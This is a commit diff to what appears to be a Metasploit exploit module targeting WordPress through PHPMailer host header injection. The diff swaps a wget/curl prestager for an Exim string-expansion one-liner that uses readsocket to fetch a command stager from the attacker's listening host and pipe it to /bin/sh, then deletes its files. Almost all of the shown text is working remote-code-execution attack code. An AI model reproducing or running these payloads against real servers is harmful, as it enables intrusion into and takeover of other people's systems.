Create a pure-Exim, one-shot HTTP client

2017-05-09 06:31:42 -05:00 · 2017-05-09 06:31:42 -05:00 · 9a64ecc9b0
parent ee55516e06
commit 9a64ecc9b0
1 changed files with 14 additions and 26 deletions
--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@ -78,13 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
    print_status("Generating #{cmdstager_flavor} command stager")
    @cmdstager = generate_cmdstager(
      'Path'   => "/#{Rex::Text.rand_text_alpha_lower(8)}",
-      :ssl   => datastore['SSL'],
      :temp    => datastore['WritableDir'],
-      :file  => File.basename(cmdstager_path)
+      :file    => File.basename(cmdstager_path),
+      :nospace => true
    ).join(';')

-    print_status("Generating and sending #{cmdstager_flavor} prestager")
-    generate_prestager(prestager_path).each do |command|
+    print_status("Generating and sending Exim prestager")
+    generate_prestager.each do |command|
      vprint_status("Sending #{command}")
      send_request_payload(command)
    end
@ -95,21 +95,14 @@ class MetasploitModule < Msf::Exploit::Remote
  #

  # Absolute paths are required for prestager commands due to execve(2)
-  def generate_prestager(file)
+  def generate_prestager
    prestager  = []
-
-    case cmdstager_flavor
-    when 'wget'
-      options = "-q --no-check-certificate --output-document #{file}"
-    when 'curl'
-      options = "-kso #{file}"
-    end
-
-    prestager << "/usr/bin/#{cmdstager_flavor} #{options} #{get_uri}"
-    prestager << "/bin/sh #{prestager_path}"
-    prestager << "/bin/rm -f #{prestager_path} #{cmdstager_path}"
-
-    prestager
+    # This is basically sh -c `wget` implemented using Exim string expansions
+    prestager << '/bin/sh -c ${extract{-1}{${run{/bin/echo}}}{${readsocket{' \
+                 "inet:#{srvhost_addr}:#{srvport}}{get #{get_resource} "\
+                 'http/1.0${run{/bin/echo}}${run{/bin/echo}}}}}}'
+    # CmdStager should rm the file, but it blocks on the payload, so we do it
+    prestager << "/bin/rm -f #{cmdstager_path}"
  end

  def send_request_payload(command)
@ -158,11 +151,6 @@ class MetasploitModule < Msf::Exploit::Remote
      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
  end

-  def prestager_path
-    @prestager_path ||=
-      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
-  end
-
  #
  # Override methods
  #